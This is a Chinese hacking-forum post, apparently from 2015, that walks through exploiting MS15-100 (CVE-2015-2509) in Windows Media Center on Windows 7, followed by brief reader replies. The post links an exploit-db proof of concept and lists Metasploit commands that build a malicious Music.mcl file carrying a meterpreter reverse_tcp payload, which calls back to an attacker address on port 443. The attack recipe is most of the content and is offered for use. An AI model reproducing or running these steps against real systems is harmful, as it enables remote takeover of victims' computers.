MS15-100 微软Media播放器漏洞利用-windows 7
本帖最后由 miko 于 2015-12-29 23:46 编辑Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
POC:https://www.exploit-db.com/exploits/38151/
------------------------------------------------------------------------
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
-----------------------------------------------------------------------------
POC:https://www.exploit-db.com/exploits/38151/
下载利用文件py生成Music.mcl
terminal:Python 38151.py
use exploit/windows/fileformat/ms15_100_mclexe
exploit( ms15_100_mclexe )>set payload windows/meterpreter/reverse_tcp
exploit( ms15_100_mclexe )>set lhost 192.168.1.13(攻击者IP)
exploit( ms15_100_mclexe )>set lport 443
exploit( ms15_100_mclexe )>exploit
编程Music.mcl文件,把恶意木马链接放进去,保存!成功!
6666#####看了就看了!! 支持,看起来不错呢! 支持,看起来不错呢! 支持中国红客联盟(ihonker.org) 感谢楼主的分享~ {:2_30:}ettercap直接攻击就好了呗~ 支持,看起来不错呢! 支持中国红客联盟(ihonker.org) 看不怎么懂
页:
[1]